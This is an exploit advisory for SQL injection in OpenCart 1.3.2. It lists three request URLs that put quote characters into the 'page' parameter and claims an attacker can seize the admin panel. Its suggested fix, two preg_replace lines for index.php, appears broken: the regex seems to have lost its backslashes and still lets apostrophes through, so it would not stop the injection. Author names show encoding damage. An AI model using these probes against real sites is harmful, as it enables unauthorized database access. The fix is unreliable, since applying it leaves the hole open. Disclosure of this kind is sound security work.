Text :  


###############[Andrés
Gómez]##############
# Exploit Title : OpenCart 1.3.2 SQL Injection
# Date : 07/03/2010
# Author : Andrés Gómez
# Software Link : http://www.coompras.com/opencart/opencart.htm
# Contact : gomezandres[4t]adinet[dot]com.uy<http://com.uy>
# Dork : No DoRk
###########
# An attacker may execute arbitrary SQL statements on the vulnerable
system.
# This may compromise the integrity of your database and/or expose
sensitive information.
###########
# Example 1: index.php?route=product%2Fspecial&path=20&page='
# Example 2: index.php?route=product%2Fspecial&path=20&page='
# Example 3:
index.php?route=product%2Fcategory&path=20&page=andres'"
###########
# Malicious users may inject SQL code into a vulnerable
# application to fool a user in order to gather data from them. An attacker
can
# take admin user and login in your panel.
###########
# Solution:
# You have to put this regular expresion in the first two lines of your
index.php
# $_GET = preg_replace("|([^ws'])|i",'',$_GET);
# $_POST = preg_replace("|([^ws'])|i",'',$_POST);
###########
# Greetz : Mauro Rossi, Ra&#195;&#186;l P&#195;&#169;rez,
Willian Mesa, Pablo Solari
# Special Thanks : HYPERNETHOST & Atenea Capacitaciones
##########################[Andr&#195;&#169;s
G&#195;&#179;mez]#################################

  References :  

None